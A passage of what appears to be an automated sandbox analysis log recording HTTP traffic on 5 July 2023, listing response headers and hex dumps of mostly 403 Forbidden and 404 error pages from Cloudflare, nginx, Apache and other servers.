-->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:38 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IhCwvtj2fgPEJ0AQ4yUi5OMchyiPrXN%2BZ51R7Nwl5ElFwsZzSYmBWomzjzVWBOfkCeCila6J5Vnc%2FfIYhp0jsiA9Q%2BaNG0YguRkWLUIGz%2FMGU4Xo9XMWCTLD43KzrFBy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dcbad10925b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:38 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=szRzSHyi%2BnwZg3FiIeY9cQ5luSdTZoUMVd%2FMX89w2Oo%2BZ%2BUHc3MNiOtEiDJ0P4FMJ1i1KbVyiI%2FGgg8Ts%2FBtWB1jyza8D2afyq%2F0x%2Bp9vIxn09ttSEkaT9aDCrQahkmY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dcc6db1925b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:39 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:54 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q1nOOoYn5n7gy8Nrjss%2F2A4gs600RanCojn4EnJhO2r88u88VtTQST%2F7MCidQfWdX1oikzZ3avR6ekFk0oGMI9FY4s0EzHolecccBn%2BT1s%2F7tCUZr2XuOTgbJPyK%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6dcdcf90bb41-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:39 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1688537259.3189278106316686X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:07:39 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:39 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:39 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:40 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: e45c5981-d8b2-4be4-a5c0-41a46493456cCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ukgDAN5bDnz%2Begef%2FjRX%2BGlBc5Pmd1A%2FUo3MiKc6vGTtwKXzgZtrkVyfN3nR6bVP%2FHKKhP0Vrybv%2BRX3eNOaN25rzzUgzbPLAvMzNBE2G72ESp0WygxUoHrHtUsX5OVrLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=188.999891Server: cloudflareCF-RAY: 7e1d6dd83a733731-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p4784fNdEj2ppEo7dZLAyyYVt1ht6ziAp7pUJgIAAn0z3mssNJvuZnis7OCppc515Q5dHVLGSv6cD%2FAP7lDEbbIv8KoWmzSpYp2ejCsen4aviVB9XC0QKgiAFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6ddeaa5d1e54-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 37 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 Data Ascii: 17aa<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 